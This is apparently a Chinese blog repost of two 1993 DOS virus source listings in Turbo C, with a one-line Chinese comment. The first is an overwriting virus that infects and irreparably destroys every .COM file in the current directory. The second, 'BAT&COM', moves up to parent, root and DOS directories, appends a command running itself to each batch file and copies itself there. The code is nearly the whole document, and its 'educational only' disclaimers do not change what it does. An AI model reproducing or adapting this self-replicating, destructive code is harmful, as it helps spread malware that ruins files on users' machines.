copy from 黑基
1
- - ------------------ Cut Here -------------------------- - -
2![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* This is a simple overwriting virus programmed in Turbo C */
3![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* It will infect all .COM files in the current directory */
4![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* Infections destroy the programs and cannot be cured */
5![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* It was presented in Virology 101 (c) 1993 Black Wolf */
6![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! */
7
#include
8
#include
9
#include
10
FILE *Virus,*Host;
11
int x,y,done;
12
char buff[256];
13
struct ffblk ffblk;
14
main()
15![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
16![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
done = findfirst("*.COM",&ffblk,0); /**//* Find a .COM file */
17![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
while (!done) /**//* Loop for all COM's in DIR*/
18![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
19![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
printf("Infecting %s\n", ffblk.ff_name); /**//* Inform user */
20![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
Virus=fopen(_argv[0],"rb"); /**//* Open infected file */
21![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
Host=fopen(ffblk.ff_name,"rb+"); /**//* Open new host file */
22![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
x=9504; /**//* Virus size - must */
23![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* be correct for the */
24![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* compiler it is made */
25![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* on, otherwise the */
26![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* entire virus may not*/
27![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* be copied!! */
28![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
while (x>256) /**//* OVERWRITE new Host */
29![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{ /**//* Read/Write 256 byte */
30![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
fread(buff,256,1,Virus); /**//* chunks until bytes */
31![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
fwrite(buff,256,1,Host); /**//* left < 256 */
32
x-=256;
33
}
34![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
fread(buff,x,1,Virus); /**//* Finish off copy */
35
fwrite(buff,x,1,Host);
36![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
fcloseall(); /**//* Close both files and*/
37![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
done = findnext(&ffblk); /**//* go for another one. */
38
}
39![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* Activation would go */
40![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//* here */
41![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
return (0); /**//* Terminate */
42
}
43
- - ------------------ Cut Here --------------------------- - -
44![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
此程序并没有提供一些函数的详细实现,但是大意非常清楚.
![](https://www.cnblogs.com/Images/OutliningIndicators/ContractedBlock.gif)
Code
1 - - - -----------------Start Code------------------------- - - -
2 /* This file is a high-level language virus of a different sort.
3 It will search out batch files and, when found, place a copy
4 of itself in the directory with the batch file while adding
5 instructions in the BAT to execute this new file. In this way,
6 it will spread each time an "infected" batch is run.
7 Disinfection is done simply by deleting all of the BAT&COM.COM
8 files and removing the commands from batch files that ruin
9 them. This one is NOT confined to the current directory,
10 so make sure it is on an isolated machine and be sure to
11 clean up any infections. PLEASE DO NOT RELEASE!
12 BAT&COM virus is (C) 1993 Black Wolf Enterprises.
13 */
14 #include
15 #include
16 #include
17 #include
18 struct ffblk ffblk;
19 main()
20 {
21 char old_dir[MAXPATH];
22 Get_Path(old_dir); /* Save the old directory */
23 Pick_A_Dir(); /* Find a new directory to */
24 Infect_Directory(); /* infect and infect it. */
25 chdir(old_dir); /* Return to old directory */
26 return 0;
27 }
28 Pick_A_Dir()
29 {
30 int done;
31 chdir(".."); /* First, Go out a DIR. */
32 done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */
33 /* root and DOS */
34 if (done)
35 {
36 chdir("\\");
37 done=findfirst("*.BAT",&ffblk,0);
38 if (done) chdir("\\DOS\\");
39 }
40 return 0;
41 }
42 Infect_Directory()
43 {
44 int done;
45 done = findfirst("*.BAT",&ffblk,0);
46 while (!done) /* Find all .BAT files */
47 { /* and add code to run */
48 Do_Batch(); /* BAT&COM if not */
49 done = findnext(&ffblk); /* already there */
50 }
51 if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */
52 {Copy_Virus();} /* not exist, then */
53 return 0; /* copy it into dir.*/
54 }
55 Do_Batch()
56 {
57 FILE *batch;
58 char Infection_Buffer[12];
59 char vpath[MAXPATH];
60 Get_Path(vpath); /* Get path for adding path */
61 /* specifier in commands */
62 if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */
63 batch=fopen(ffblk.ff_name, "rt+");
64 fseek(batch, -11, SEEK_END);
65 fread(Infection_Buffer,11,1,batch);
66 Infection_Buffer[11]=0; /* Terminate String */
67 if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */
68 { /* Batch is */
69 fseek(batch, 0, SEEK_END); /* infected.*/
70 fprintf(batch,"\n%s\\BAT&COM.COM",vpath);
71 } /*^- Add command */
72 /* to batch */
73 fclose(batch);
74 return 0;
75 }
76 Copy_Virus()
77 {
78 FILE *old_virus, *new_virus;
79 int write_length;
80 char copy_buffer[1024]; /* Copy the virus to */
81 /* new directory */
82 old_virus=fopen(_argv[0],"rb");
83 new_virus=fopen("BAT&COM.COM","wb");
84 write_length=1024;
85 while (write_length==1024)
86 {
87 write_length=fread(copy_buffer,1,1024,old_virus);
88 fwrite(copy_buffer,write_length,1,new_virus);
89 }
90 fclose(old_virus);
91 fclose(new_virus);
92 return 0;
93 }
94 Get_Path(char *path)
95 {
96 strcpy(path, "A:\\");
97 path[0] ='A' + getdisk(); /* Returns current path */
98 getcurdir(0, path+3);
99 return 0;
100 }
101 - - - -----------------End of Code-----------------